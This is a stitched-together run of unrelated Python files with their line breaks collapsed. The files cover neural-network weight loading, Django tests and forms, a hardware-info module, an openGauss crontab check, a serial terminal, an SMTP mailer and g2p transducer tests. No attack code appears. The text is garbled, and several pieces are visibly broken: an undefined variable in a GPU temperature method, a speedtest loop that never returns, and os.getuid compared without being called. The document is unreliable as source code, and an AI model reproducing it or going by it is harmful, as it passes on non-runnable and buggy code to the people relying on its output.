num_bn_biases bn_weights = torch.from_numpy( weights[ptr:ptr+num_bn_biases]) bn_weights = bn_weights.view_as(bn.weight.data) bn.weight.data.copy_(bn_weights) ptr += num_bn_biases bn_running_mean = torch.from_numpy( weights[ptr:ptr+num_bn_biases]) bn_running_mean = bn_running_mean.view_as(bn.running_mean) bn.running_mean.copy_(bn_running_mean) ptr += num_bn_biases bn_running_var = torch.from_numpy( weights[ptr:ptr+num_bn_biases]) bn_running_var = bn_running_var.view_as(bn.running_var) bn.running_var.copy_(bn_running_var) ptr += num_bn_biases else: num_biases = conv.bias.numel() conv_biases = torch.from_numpy(weights[ptr:ptr+num_biases]) conv_biases = conv_biases.view_as(conv.bias.data) conv.bias.data.copy_(conv_biases) ptr = ptr + num_biases num_weights = conv.weight.numel() conv_weights = torch.from_numpy(weights[ptr:ptr+num_weights]) conv_weights = conv_weights.view_as(conv.weight.data) conv.weight.data.copy_(conv_weights) ptr = ptr + num_weights # -*- coding: utf-8 -*- from __future__ import absolute_import, division, unicode_literals from builtins import chr from future.utils import python_2_unicode_compatible import random from quepy.expression import Expression def get_random_unichar(): # returns only encodable unicode chars while True: x = random.random() if 0.1 > x: c = random.choice(" ./\n") elif 0.50 > x: c = chr(random.randint(65, 122)) elif 0.85 > x: c = chr(random.randint(0, 127)) else: c = chr(random.randint(0, 65535)) try: c.encode("utf-8") return c except UnicodeEncodeError: pass def random_data(only_ascii=False): data = [] first = True while first or 1 / 20 < random.random(): first = False if only_ascii: c = chr(random.randint(33, 126)) data.append(c) else: c = get_random_unichar() data.append(c) return "".join(data) def random_relation(only_ascii=False): data = random_data(only_ascii) data = data.replace(" ", "") if random.random() > 0.05: return data @python_2_unicode_compatible class UnicodeableDummy(object): def __str__(self): return data return UnicodeableDummy() def random_expression(only_ascii=False): """ operations: new node, add data, decapitate, merge """ mean_size = 20 xs = [40, 30, 50, 20] xs = [x * (1 - random.random()) for x in xs] assert all(x != 0. for x in xs) new_node, add_data, decapitate, _ = [x / sum(xs) for x in xs] expressions = [Expression(), Expression(), Expression(), Expression()] while len(expressions) != 1: if (1 / mean_size) < random.random(): # Will start to merge more and will not create new nodes new_node = 0. # Choose action r = random.random() if r < new_node: # New expression expressions.append(Expression()) elif r < add_data + new_node: # Add data e = random.choice(expressions) e.add_data(random_relation(only_ascii), random_data(only_ascii)) elif r < decapitate + add_data + new_node: # Decapitate e = random.choice(expressions) e.decapitate(random_relation(only_ascii), reverse=(0.25 < random.random())) elif len(expressions) != 1: # Merge random.shuffle(expressions) e2 = expressions.pop() e1 = expressions[-1] e1 += e2 return expressions[0] import aiohttp async def get_rates(session: aiohttp.ClientSession, base: str): async with session.get( f"https://api.exchangeratesapi.io/latest?base={base}" ) as response: rates = (await response.json())['rates'] rates[base] = 1. return base, rates Rhithick02/FilesharingFilesharing/client_test.py import asyncio import networking async def client_thing(): await networking.port_scanner() if __name__ == '__main__': networking.my_NAME = 'client' asyncio.get_event_loop().create_task(client_thing()) asyncio.get_event_loop().create_task(networking.status_update()) asyncio.get_event_loop().run_forever() 0 import re from django.test import TestCase from board.models import Post, Board, Comment from accounts.models import Account class BoardAppTest(TestCase): fixtures = ['test.json'] @classmethod def setUpTestData(cls): super().setUpTestData() cls.default_board = Board.objects.get(id=1) cls.user = Account.objects.get(id=1) def login(self): user = Account.objects.get(id=1) self.client.login(username=user.username, password='') def remove_csrf(self, origin): csrf_regex = r']+csrfmiddlewaretoken[^>]+>' return re.sub(csrf_regex, '', origin) kethan1/Hardware-Info """ This is a module used to get hardware info """ import psutil import cpuinfo import math import platform import sys import sysconfig from datetime import datetime import speedtest class CPU: info = cpuinfo.get_cpu_info() @staticmethod def cpu_cores(hyperthreading = False): return psutil.cpu_count(logical = hyperthreading) @staticmethod def architecture(): return CPU.info['arch'] @staticmethod def name(): return CPU.info['brand_raw'] @staticmethod def percent(time=0.2): return psutil.cpu_percent(time) @staticmethod def temp(fahrenheit=False): if platform.system() == 'Linux': return psutil.sensors_temperatures(fahrenheit=fahrenheit)['coretemp'] elif platform.system() == 'Windows': import WinTmp return WinTmp.CPU_Temp() elif platform.system() == 'Darwin': import MacTmp return MacTmp.CPU_Temp() class GPU: @staticmethod def Get_Gpus(multiple=False): if platform.system() == 'Windows': import wmi computer = wmi.WMI() if multiple: return [gpu.name for gpu in computer.Win32_VideoController()] else: return computer.Win32_VideoController()[0] @staticmethod def temp(): if platform.system() == 'Linux': return psutil.sensors_temperatures(fahrenheit=fahrenheit) elif platform.system() == 'Windows': import WinTmp return WinTmp.GPU_Temp() elif platform.system() == 'Darwin': import MacTmp return MacTmp.GPU_Temp() class Ram: mem = psutil.virtual_memory() @staticmethod def total_mem(acc): return round(Ram.mem.total/1000000000, acc) @staticmethod def used_mem(acc): return round(Ram.mem.used/1000000000, acc) @staticmethod def free_mem(acc): return round(Ram.mem.available/1000000000, acc) @staticmethod def refresh(): Ram.mem = psutil.virtual_memory() class Disk: @staticmethod def list_disks(every = False): return [{'device': i[0], 'mountpoint': i[1], 'fstype': i[2], 'opts': i[3]} for each in psutil.disk_partitions(all=every) for i in list(each)] @staticmethod def get_size(bts, suffix="B"): """ Scale bytes to its proper format e.g: 1253656 => '1.20MB' 1253656678 => '1.17GB' """ factor = 1024 for unit in ["", "K", "M", "G", "T", "P"]: if bts < factor: return f"{bts:.2f}{unit}{suffix}" bts /= factor @staticmethod def total_r_and_w(): disk_io = psutil.disk_io_counters() return {'read': Disk.get_size(disk_io.read_bytes), 'write': Disk.get_size(disk_io.write_bytes)} @staticmethod def space(every=False): partitions = psutil.disk_partitions(all=every) to_return = {} for partition in partitions: try: partition_usage = psutil.disk_usage(partition.mountpoint) except PermissionError: # this can be catched due to the disk that # isn't ready continue to_return[(partition.device, partition.mountpoint, partition.fstype)] = { 'total': Disk.get_size(partition_usage.total), 'used': Disk.get_size(partition_usage.used), 'free': Disk.get_size(partition_usage.free), 'usage_percentage': partition_usage.percent } return to_return class Network: @staticmethod def get_ip(): import socket s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) try: # doesn't have to be reachable s.connect(('10.255.255.255', 1)) IP = s.getsockname()[0] except Exception: IP = None finally: s.close() return IP @staticmethod def singlespeedtest(): s = speedtest.Speedtest() s.get_servers() s.get_best_server() s.download() s.upload() res = s.results.dict() return res["download"], res["upload"], res["ping"] @staticmethod def speedtest(): for i in range(3): d, u, p = Network.singlespeedtest() print('Test #{}\n'.format(i+1)) if i == 3: return {'Download': d, 'Upload': u, 'Ping': p} class PythonInfo: version = (str(sys.version_info[0])+'.'+str(sys.version_info[1])+'.'+str(sys.version_info[2])) interpreterlocation = sys.executable location = sys.exec_prefix copyrightinfo = sys.copyright pythoninfo = sys.version class System: @staticmethod def name(): return [platform.system(), platform.release()] @staticmethod def hardware(more = False): if platform.system() == 'Windows': import wmi computer = wmi.WMI() if more: cpus = [proc for proc in computer.Win32_Processor()] gpus = [gpu for gpu in computer.Win32_VideoController()] else: cpus = [proc.name for proc in computer.Win32_Processor()] gpus = [gpu.name for gpu in computer.Win32_VideoController()] return {'cpus': cpus, 'gpus': gpus} else: return None @staticmethod def users(): return psutil.users() @staticmethod def fans_rpm(): if platform.system() == 'Linux': return psutil.sensors_fans() else: return None @staticmethod def battery_info(): info = (list(psutil.sensors_battery())) return {'Percentage': info[0], 'SecondLeft': info[1], 'MinutesLeft': round(info[1]/60), 'HoursLeft': round(info[1]/1440, 2), 'PluggedIn': info[2]} import argparse import torch from models.geo.geo_gnn_ppi_manager import GeoPPIManager # sys.path.extend(['/GraphNAS']) torch.manual_seed(123) torch.cuda.manual_seed_all(123) def build_args(): parser = argparse.ArgumentParser(description='GraphNAS') parser.add_argument('--random_seed', type=int, default=123) parser.add_argument("--cuda", type=bool, default=True, required=False, help="run in cuda mode") # child model parser.add_argument("--in-feats", type=int, default=50, help="number of input features") parser.add_argument("--num-class", type=int, default=121, help="number of output units") parser.add_argument("--dataset", type=str, default="ppi", required=False, help="The input dataset.") parser.add_argument("--epochs", type=int, default=50, help="number of training epochs") parser.add_argument("--retrain_epochs", type=int, default=300, help="number of training epochs") parser.add_argument("--multi_label", type=bool, default=False, help="multi_label or single_label task") parser.add_argument("--residual", action="store_false", help="use residual connection") parser.add_argument("--in-drop", type=float, default=0, help="input feature dropout") parser.add_argument("--lr", type=float, default=0.005, help="learning rate") parser.add_argument("--param_file", type=str, default="ppi.pkl", help="learning rate") parser.add_argument("--optim_file", type=str, default="ppi_optim.pkl", help="optimizer save path") parser.add_argument('--weight_decay', type=float, default=0) parser.add_argument('--max_param', type=float, default=5E6) args = parser.parse_args() return args if __name__ == "__main__": actions = ['gat', 'sum', 'elu', 4, 256, 'gat', 'sum', 'elu', 4, 256, 'gat', 'sum', 'linear', 6, 121] args = build_args() manager = GeoPPIManager(args) manager.train(actions) 0 from .models import Contact from django.forms import Textarea from django.forms import ModelForm from django.forms import TextInput from captcha.fields import CaptchaField class ContactForm(ModelForm): captcha = CaptchaField() class Meta: model = Contact fields = ("name", "surname", "nick_name", "alias", "place", "birth_date", "phone_number_one", "phone_number_two", "phone_number_three", "email_one", "email_two", "email_three", "email_four", "telegram_user", "github_user", "bitbucket_user", "facebook_user", "pinterest_user", "twitter_user", "additional_data") widgets = { 'name': TextInput(attrs={'class': 'form-control'}), 'surname': TextInput(attrs={'class': 'form-control'}), 'nick_name': TextInput(attrs={'class': 'form-control'}), 'alias': TextInput(attrs={'class': 'form-control'}), 'place': Textarea(attrs={'class': 'form-control'}), 'birth_date': TextInput(attrs={'class': 'form-control'}), 'phone_number_one': TextInput(attrs={'class': 'form-control'}), 'phone_number_two': TextInput(attrs={'class': 'form-control'}), 'phone_number_three': TextInput(attrs={'class': 'form-control'}), 'email_one': TextInput(attrs={'class': 'form-control'}), 'email_two': TextInput(attrs={'class': 'form-control'}), 'email_three': TextInput(attrs={'class': 'form-control'}), 'email_four': TextInput(attrs={'class': 'form-control'}), 'telegram_user': TextInput(attrs={'class': 'form-control'}), 'github_user': TextInput(attrs={'class': 'form-control'}), 'bitbucket_user': TextInput(attrs={'class': 'form-control'}), 'facebook_user': TextInput(attrs={'class': 'form-control'}), 'pinterest_user': TextInput(attrs={'class': 'form-control'}), 'twitter_user': TextInput(attrs={'class': 'form-control'}), 'additional_data': Textarea(attrs={'class': 'form-control'}) } # -*- coding:utf-8 -*- # Copyright (c) 2020 Huawei Technologies Co.,Ltd. # # openGauss is licensed under Mulan PSL v2. # You can use this software according to the terms # and conditions of the Mulan PSL v2. # You may obtain a copy of Mulan PSL v2 at: # # http://license.coscl.org.cn/MulanPSL2 # # THIS SOFTWARE IS PROVIDED ON AN "AS IS" BASIS, # WITHOUT WARRANTIES OF ANY KIND, # EITHER EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO NON-INFRINGEMENT, # MERCHANTABILITY OR FIT FOR A PARTICULAR PURPOSE. # See the Mulan PSL v2 for more details. # ---------------------------------------------------------------------------- import os import subprocess from gspylib.inspection.common import SharedFuncs from gspylib.inspection.common.CheckItem import BaseItem from gspylib.inspection.common.CheckResult import ResultStatus from gspylib.os.gsplatform import g_Platform from gspylib.common.ErrorCode import ErrorCode class CheckCrontabLeft(BaseItem): def __init__(self): super(CheckCrontabLeft, self).__init__(self.__class__.__name__) self.crontabUser = None def preCheck(self): super(CheckCrontabLeft, self).preCheck() if not "crontabUser" in self.threshold.keys(): raise Exception(ErrorCode.GAUSS_530["GAUSS_53013"] % "Threshold crontabUser") self.crontabUser = self.threshold['crontabUser'] def doCheck(self): parRes = "" cmd = g_Platform.getAllCrontabCmd() allCrontab = SharedFuncs.runShellCmd(cmd, self.user) for crontabService in allCrontab.split('\n'): if crontabService.find('om_monitor') >= 0: parRes = "Gauss process om_monitor remains in crontab. " \ "please delete this gauss info." self.result.raw += "%s\n" % crontabService if parRes: self.result.rst = ResultStatus.NG self.result.val = parRes else: self.result.rst = ResultStatus.OK def doSet(self): if os.getuid == 0: cmd = "crontab -l -u '%s'" % self.crontabUser else: cmd = "crontab -l" (status, output) = subprocess.getstatusoutput(cmd) if status != 0 or output.find('om_monitor') < 0: self.result.val = "No gauss process in crontab.\n" return tmpCrondFileName = "gauss_crond_tmp" tmpCrondFile = os.path.join(self.tmpPath, tmpCrondFileName) try: SharedFuncs.createFile(tmpCrondFile, self.tmpPath) SharedFuncs.writeFile(tmpCrondFile, output, self.tmpPath) cmd = "sed -i '/om_monitor/d' %s" % tmpCrondFile SharedFuncs.runShellCmd(cmd) cmd = "crontab %s " % tmpCrondFile if os.getuid == 0: cmd = "su - %s '%s'" % (self.crontabUser, cmd) (status, output) = subprocess.getstatusoutput(cmd) if status != 0: self.result.val = "Failed to cleaned om_monitor in crontab." \ " Error: %s\n" % output + "The cmd is %s " \ % cmd else: self.result.val = "Successfully to cleaned om_monitor " \ "in crontab.\n" SharedFuncs.cleanFile(tmpCrondFile) except Exception as e: if os.path.exists(tmpCrondFile): SharedFuncs.cleanFile(tmpCrondFile) raise Exception(str(e)) # -*- coding: utf-8; -*- # # @file __init__.py # @brief rest sub-package init. Contains common enums. # @author (INRA UMR1095) # @date 2015-02-10 # @copyright Copyright (c) 2015 INRA # @license MIT (see LICENSE file) # @details from enum import Enum class Method(Enum): def __init__(self, code, safe): self.code = code self.safe = safe GET = (0, False) POST = (1, True) PUT = (2, True) DELETE = (3, True) PATCH = (4, False) OPTIONS = (5, False) HEAD = (6, False) class Format(Enum): def __init__(self, code, accept, verbose): self.code = code self.accept = accept self.verbose = verbose ANY = (0, '*/*', '*/*') TEXT = (1, 'text/plain-text', 'text/plain-text; encoding=utf-8') HTML = (2, 'text/html', 'text/html; encoding=utf-8') JSON = (3, 'application/json', 'application/json; encoding=utf-8') XML = (4, 'application/xml', 'application/xml; encoding=utf-8') MULTIPART = (5, 'multipart/form-data', 'multipart/form-data') @property def content_type(self): return self.accept mindis/timeseries2redis #!/usr/bin/env python # -*- coding: utf-8 -*- VERSION = '0.1' # import sys import os from setuptools import setup, find_packages from setuptools.extension import Extension setup(name='timeseries2redis', version=VERSION, description='timeseries2redis', author='trbck', packages=find_packages(), package_data={'timeseries2redis': ['timeseries2redis.py']}, ) "Fake useragent randomly generates a useragent for fetching a webpage without a browser." __version__ = "0.0.15" #!/usr/bin/env python3 # -*- coding: utf-8 -*- import sys, os import serial import threading import time import signal import builtins def print(*args): builtins.print(*args, sep=' ', end='', file=None, flush=True) exit_terminal = False def exit_sig_handler(sig, frame): print('Got signal to exit') global exit_terminal exit_terminal = True def serial_handler(option): while not exit_terminal: operation = False line = option['port'].readline().decode('utf-8') if len(line) > 0: # pexpect will change the LF to CRLF. # If the original string is CRLF, it will become CRCRLF in pexpect. if os.name == 'nt': if len(line) > 2 and line[-1] == '\n' and line[-2] == '\r': line = line[:-2] + '\n' print(line) operation = True if operation == False: time.sleep(0.1) class SerialTerminal(): """This module provides a simple terminal which can communicate with serial device. """ option = { 'port' : None } def __init__(self, port): """[ parameters ] port : pyserial's instance """ if not port.is_open: raise ValueError('serial port doesn\'t open') self.option['port'] = port global exit_terminal exit_terminal = False signal.signal(signal.SIGINT, exit_sig_handler) def start(self): self.serial_thread = threading.Thread(target = serial_handler, args = (self.option,)) self.serial_thread.start() def write(self, data): self.option['port'].write(data.encode('utf-8')) def abort(self): global exit_terminal exit_terminal = True self.serial_thread.join() def is_alive(self): return not exit_terminal if __name__ == '__main__': port = serial.Serial('/dev/ttyUSB0', 115200, timeout=0) terminal = SerialTerminal(port) terminal.start() while terminal.is_alive(): char = sys.stdin.read(1) if char == '\x03': # Ctl-C break if char == '\n': terminal.write('\r') else: terminal.write(char) terminal.abort() port.close() import os import smtplib import datetime from email.mime.text import MIMEText from email.mime.multipart import MIMEMultipart from email.mime.base import MIMEBase from email import encoders # Accountinformationen zum Senden der E-Mail Empfaenger = 'ADDRESS@DOMAIN' Absender = 'ADDRESS@DOMAIN' Passwort = 'PASSWORD' smtpserver = smtplib.SMTP('DOMAIN', 587) smtpserver.ehlo() smtpserver.starttls() smtpserver.ehlo # In Account einloggen smtpserver.login(Absender, Passwort) # Aktuelles Datum holen Datum = datetime.date.today() def send(data): msg = MIMEText(data) # Betreff + Datum msg['Subject'] = 'temperaturlog raspi - %s' % Datum.strftime('%b %d %Y') # Absender msg['From'] = Absender #Empfaenger msg['To'] = Empfaenger # E-Mail abschicken smtpserver.sendmail(Absender, [Empfaenger], msg.as_string()) smtpserver.quit() def send_attachment(files): msg = MIMEMultipart()#MIMEText(data) # Betreff + Datum msg['Subject'] = 'Temperatur- und Feuchteverlauf Keller - %s' % Datum.strftime('%b %d %Y') # Absender msg['From'] = Absender #Empfaenger msg['To'] = Empfaenger #Inhalt part= MIMEText('Luftfeuchteverlauf der letzten Zeit') for path in files: part = MIMEBase('application', "octet-stream") with open(path, 'rb') as file: part.set_payload(file.read()) encoders.encode_base64(part) part.add_header('Content-Disposition','attachment; filename="{}"'.format(os.path.basename(path))) msg.attach(part) # E-Mail abschicken smtpserver.sendmail(Absender, [Empfaenger], msg.as_string()) smtpserver.quit() # Copyright 2008-2010 Nokia Siemens Networks Oyj # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Module that adds directories needed by Robot to sys.path when imported.""" import sys import os import fnmatch def add_path(path, to_beginning=False, force=False): if _should_be_added(path, force): if to_beginning: sys.path.insert(0, path) else: sys.path.append(path) def remove_path(path): path = _normpath(path) sys.path = [p for p in sys.path if _normpath(p) != path] def _should_be_added(path, force): if (not path) or _find_in_syspath_normalized(path): return False return force or os.path.exists(path) def _find_in_syspath_normalized(path): path = _normpath(path) for element in sys.path: if _normpath(element) == path: return element return None def _normpath(path): return os.path.normcase(os.path.normpath(path)) ROBOTDIR = os.path.dirname(os.path.abspath(__file__)) PARENTDIR = os.path.dirname(ROBOTDIR) add_path(os.path.join(ROBOTDIR, 'libraries'), to_beginning=True, force=True) add_path(PARENTDIR, to_beginning=True) # Handles egg installations if fnmatch.fnmatchcase(os.path.basename(PARENTDIR), 'robotframework-*.egg'): add_path(os.path.dirname(PARENTDIR), to_beginning=True) # Remove ROBOTDIR dir to disallow importing robot internal modules directly remove_path(ROBOTDIR) # Elements from PYTHONPATH. By default it is not processed in Jython and in # Python valid non-absolute paths may be ignored. PYPATH = os.environ.get('PYTHONPATH') if PYPATH: for path in PYPATH.split(os.pathsep): add_path(path) del path # Current dir (it seems to be in Jython by default so let's be consistent) add_path('.') del _find_in_syspath_normalized, _normpath, add_path, remove_path, ROBOTDIR, PARENTDIR, PYPATH import enum __all__ = [ "load" ] def load_local(config): from mediaman.services.local import service as localservice return localservice.LocalService(config) def load_drive(config): # Apply monkey patches first from mediaman.patches.drive import patch_googleapiclient patch_googleapiclient.patch_googleapiclient_http() from mediaman.services.drive import service as driveservice return driveservice.DriveService(config) class ServiceType(enum.Enum): FOLDER = "folder" GOOGLE_DRIVE = "google drive" DROPBOX = "dropbox" AWS_S3 = "aws s3" AWS_GLACIER = "aws glacier" SERVICE_TYPE_TO_LOADER = { ServiceType.FOLDER: load_local, ServiceType.GOOGLE_DRIVE: load_drive, } def load(service_type: ServiceType, config): try: return SERVICE_TYPE_TO_LOADER[service_type](config) except KeyError as exc: print(f"No service loader configured for {service_type}!") raise from datetime import datetime from unittest import TestCase from uhlive.stream.recognition import events from .recog_events import ( grammar_defined, method_failed, params_set, recognition_complete, session_opened, ) class TestEventDeserialization(TestCase): def test_session_opened(self): event = events.deserialize(session_opened) self.assertIsInstance(event, events.Opened) self.assertEqual(event.request_id, 0) self.assertEqual(event.channel_id, "testuie46e4ui6") self.assertEqual(event.headers, {}) self.assertIsNone(event.completion_cause) self.assertIsNone(event.completion_reason) self.assertIsNone(event.body) def test_grammar_defined(self): event = events.deserialize(grammar_defined) self.assertIsInstance(event, events.GrammarDefined) self.assertEqual(event.request_id, 1) self.assertEqual(event.channel_id, "testuie46e4ui6") self.assertEqual(event.headers, {}) self.assertIsNone(event.completion_cause) self.assertIsNone(event.completion_reason) self.assertIsNone(event.body) def test_params_set(self): event = events.deserialize(params_set) self.assertIsInstance(event, events.ParamsSet) self.assertEqual(event.request_id, 2) self.assertEqual(event.channel_id, "testuie46e4ui6") self.assertEqual(event.headers, {}) self.assertIsNone(event.completion_cause) self.assertIsNone(event.completion_reason) self.assertIsNone(event.body) def test_recognition_complete(self): event = events.deserialize(recognition_complete) self.assertIsInstance(event, events.RecognitionComplete) self.assertEqual(event.request_id, 3) self.assertEqual(event.channel_id, "testuie46e4ui6") self.assertEqual(event.headers, {}) self.assertEqual(event.completion_cause, events.CompletionCause.Success) self.assertIsNone(event.completion_reason) result = event.body self.assertIsInstance(result, events.RecogResult) self.assertIsInstance(result.asr, events.Transcript) self.assertIsInstance(result.nlu, events.Interpretation) self.assertEqual(result.grammar_uri, "session:immat") self.assertEqual(result.nlu.value, "bc305fz") self.assertEqual( result.asr.transcript, "attendez alors voilà baissé trois cent cinq f z" ) self.assertEqual(result.asr.start, datetime(2021, 8, 20, 10, 5, 34, 909000)) def test_method_failed(self): event = events.deserialize(method_failed) self.assertIsInstance(event, events.MethodFailed) self.assertEqual(event.request_id, 2) self.assertEqual(event.channel_id, "testuie46e4ui6") self.assertEqual(event.headers, {}) self.assertEqual(event.completion_cause, events.CompletionCause.GramLoadFailure) self.assertEqual(event.completion_reason, "unknown grammar 'toto'") def test_event_str(self): # We just want to be sure we don't raise exceptions event = events.deserialize(session_opened) print(event) event = events.deserialize(grammar_defined) print(event) event = events.deserialize(params_set) print(event) event = events.deserialize(recognition_complete) print(event) event = events.deserialize(method_failed) print(event) preDefogData.py import argparse import re import os import shutil def get_arguments(): """Parse the arguments from the command line. Returns: Parsed arguments """ parser = argparse.ArgumentParser( description='Script for the preparation of dehaze dataset') parser.add_argument('--clear_folder', default='ITS_v2/clear', help='Folder with dehaze clear datasets') parser.add_argument('--hazy_folder', default='ITS_v2/hazy', help='Folder with dehaze hazy datasets') return parser.parse_args() def checkDir(dirPath): if not os.path.exists(dirPath): os.makedirs(dirPath) def main(): args = get_arguments() if not os.path.exists(args.clear_folder): raise FileNotFoundError('Folder %s not found!' % args.dataset_folder) if not os.path.exists(args.hazy_folder): raise FileNotFoundError('Folder %s not found!' % args.dataset_folder) norainDir_train = 'defog_dataset/train_datasets/norain' rainDir_train = 'defog_dataset/train_datasets/rain/X2' norainDir_test = 'defog_dataset/test_datasets/norain' rainDir_test = 'defog_dataset/test_datasets/rain/X2' checkDir('defog_dataset') checkDir('defog_dataset/train_datasets') checkDir('defog_dataset/test_datasets') checkDir('defog_dataset/train_datasets/rain') checkDir('defog_dataset/test_datasets/rain') checkDir(norainDir_train) checkDir(norainDir_test) checkDir(rainDir_train) checkDir(rainDir_test) # prepare clear files for train and test for clear_files in os.listdir(args.clear_folder): oldname = os.path.join(args.clear_folder, clear_files) for i in range(10): j = i + 1 newfile=clear_files[0:len(clear_files)-4]+'_'+str(j)+'.png' if (int)(clear_files.split('.')[0]) <= 1360: newfile_path=os.path.join(norainDir_train,newfile) else: newfile_path=os.path.join(norainDir_test,newfile) shutil.copyfile(oldname,newfile_path) # prepare hazy files for train and test for hazy_files in os.listdir(args.hazy_folder): oldname = os.path.join(args.hazy_folder, hazy_files) newfile = hazy_files[0: len(hazy_files) - len(hazy_files.split('_')[2]) - 1] + 'x2.png' if (int)(hazy_files.split('_')[0]) <= 1360: newname = os.path.join(rainDir_train, newfile) else: newname = os.path.join(rainDir_test, newfile) shutil.copyfile(oldname,newname) shutil.rmtree(args.clear_folder) shutil.rmtree(args.hazy_folder) if __name__ == '__main__': main() #!/usr/bin/env python3 """ Unittests for index preservation """ from unittest import main, TestCase from g2p.mappings import Mapping from g2p.transducer import Transducer class IndicesTest(TestCase): ''' Basic Transducer Test Preserve character-level mappings: Test Case #1 # Simple conversion 0 1 2 3 t e s t p e s t 0 1 2 3 [ ((0, 't'), (0, 'p')), ((1, 'e'), (1, 'e')), ((2, 's'), (2, 's')), ((3, 't'), (3, 't')) ] Test Case #2: # Allow for deletion of segments 0 1 2 3 t e s t t s t 0 1 2 [ ((0, 't'), (0, 't')), ((1, 'e'), (1, '')), ((2, 's'), (2, 's')), ((3, 't'), (3, 't')) ] Test Case #3 # Allow for one-to-many 0 1 2 3 t e s t c h e s t 0 1 2 3 4 [ ((0, 't'), (0, 'c')), ((0, 't'), (1, 'h')), ((1, 'e'), (2, 'e')), ((2, 's'), (3, 's')), ((3, 't'), (4, 't')) ] Test Case #4 # Allow for many-to-one 0 1 2 3 t e s t p s t 0 1 2 [ ((0, 't'), (0, 'p')), ((1, 'e'), (0, 'p')), ((2, 's'), (1, 's')), ((3, 't'), (2, 't')) ] Test Case #5 # Allow for epenthesis 0 1 2 3 t e s t t e s t y 0 1 2 3 4 [ ((-1, 'y'), (4, 'y')), ((0, 't'), (0, 't')), ((1, 'e'), (1, 'e')), ((2, 's'), (2, 's')), ((3, 't'), (3, 't')) ] Test Case #6 # Allow metathesis 0 1 2 3 t e s t t s e t 0 1 2 3 [ ((0, 't'), (0, 't')), ((1, 'e'), (2, 'e')), ((2, 's'), (1, 's')), ((3, 't'), (3, 't')) ] Test Case #7 # Allow order-sensitive operations 0 1 2 3 t e s t t e s h t 0 1 2 3 4 t e s t 0 1 2 3 AS IS [ ((0, 't'), (0, 't')), ((1, 'e'), (1, 'e')), ((2, 's'), (2, 's')), ((3, 't'), (3, 't')) ] or not [ ((0, 't'), (0, 't')), ((1, 'e'), (1, 'e')), ((2, 's'), (2, 's')), ((2, 's'), (3, 'h')), ((3, 't'), (4, 't')) ] Test Case #8 # Allow multiple processes which alter the indices 0 1 2 3 t e s t c h e s t 0 1 2 3 4 c h e s s 0 1 2 3 4 [ ((0, 't'), (0, 'c')), ((1, 'e'), (1, 'h')), ((1, 'e'), (2, 'e')), ((2, 's'), (3, 's')), ((3, 't'), (4, 's')) ] ''' def setUp(self): self.test_mapping_one = Mapping( [{'in': 't', "out": 'p', 'context_after': 'e'}]) self.test_mapping_two = Mapping([{"in": 'e', "out": ""}]) self.test_mapping_three = Mapping( [{"in": 't', 'out': 'ch', 'context_after': 'e'}]) self.test_mapping_four = Mapping([{'in': 'te', 'out': 'p'}]) self.test_mapping_five = Mapping( [{'context_before': 't', 'context_after': '$', 'in': '', 'out': 'y'}]) self.test_mapping_six = Mapping( [{"in": "e{1}s{2}", "out": "s{2}e{1}"}] ) self.test_mapping_seven = Mapping( [{"in": "s", "out": "sh"}, {"in": "sh", "out": "s"}], rule_ordering="apply-longest-first" ) self.test_mapping_seven_as_written = Mapping( [{"in": "s", "out": "sh"}, {"in": "sh", "out": "s"}]) self.test_mapping_eight = Mapping([{"in": "te", "out": "che"}, {"in": "t", "out": "s"}]) self.test_mapping_nine = Mapping([{'in': 'aa', 'out': ''}]) self.test_mapping_ten = Mapping([{'in': 'abc', 'out': 'a'}]) self.test_mapping_combining = Mapping( [{'in': 'k{1}\u0313{2}', 'out': "'{2}k{1}"}]) self.test_mapping_wacky = Mapping( [{"in": "\U0001f600{1}\U0001f603\U0001f604{2}\U0001f604{3}", "out": "\U0001f604\U0001f604\U0001f604{2}\U0001f604{3}\U0001f604{1}"}] ) self.test_mapping_wacky_lite = Mapping( [{"in": "a{1}bc{2}c{3}", "out": "ccc{2}c{3}c{1}"}] ) self.test_mapping_circum = Mapping( [{'in': 'a{1}c{2}', 'out': 'c{2}a{1}c{2}'}] ) self.trans_one = Transducer(self.test_mapping_one) self.trans_two = Transducer(self.test_mapping_two) self.trans_three = Transducer(self.test_mapping_three) self.trans_four = Transducer(self.test_mapping_four) self.trans_five = Transducer(self.test_mapping_five) self.trans_six = Transducer(self.test_mapping_six) self.trans_seven = Transducer(self.test_mapping_seven) self.test_seven_as_written = Transducer(self.test_mapping_seven_as_written) self.trans_eight = Transducer(self.test_mapping_eight) self.trans_nine = Transducer(self.test_mapping_nine) self.trans_ten = Transducer(self.test_mapping_ten) self.trans_combining = Transducer(self.test_mapping_combining) self.trans_wacky = Transducer(self.test_mapping_wacky) self.trans_wacky_lite = Transducer(self.test_mapping_wacky_lite) self.trans_circum = Transducer(self.test_mapping_circum) def test_no_indices(self): """ Test straightforward conversion without returning indices. """ transducer = self.trans_combining('k\u0313am') self.assertEqual(transducer.output_string, "'kam") def test_combining(self): """ Test index preserving combining characters """ transducer = self.trans_combining('k\u0313am') self.assertEqual(transducer.output_string, "'kam") self.assertEqual(transducer.edges, [(0, 1), (1, 0), (2, 2), (3, 3)]) def test_wacky(self): """ Test weird Unicode emoji transformation... """ transducer_lite = self.trans_wacky_lite( 'abcc') transducer_lite_extra = self.trans_wacky_lite( 'abcca') self.assertEqual( transducer_lite.output_string, 'ccccc') self.assertEqual( transducer_lite_extra.output_string, 'ccccca') self.assertEqual( transducer_lite.edges, [(0, 4), (1, 0), (2, 1), (2, 2), (3, 3)]) self.assertEqual( transducer_lite_extra.edges, [(0, 4), (1, 0), (2, 1), (2, 2), (3, 3), (4, 5)]) transducer_no_i = self.trans_wacky( '\U0001f600\U0001f603\U0001f604\U0001f604') self.assertEqual( transducer_no_i.output_string, '\U0001f604\U0001f604\U0001f604\U0001f604\U0001f604') transducer = self.trans_wacky( '\U0001f600\U0001f603\U0001f604\U0001f604') self.assertEqual( transducer.output_string, '\U0001f604\U0001f604\U0001f604\U0001f604\U0001f604') self.assertEqual( transducer.edges, [(0, 4), (1, 0), (2, 1), (2, 2), (3, 3)]) def test_circum(self): """ Test circumfixing """ transducer = self.trans_circum('ac') 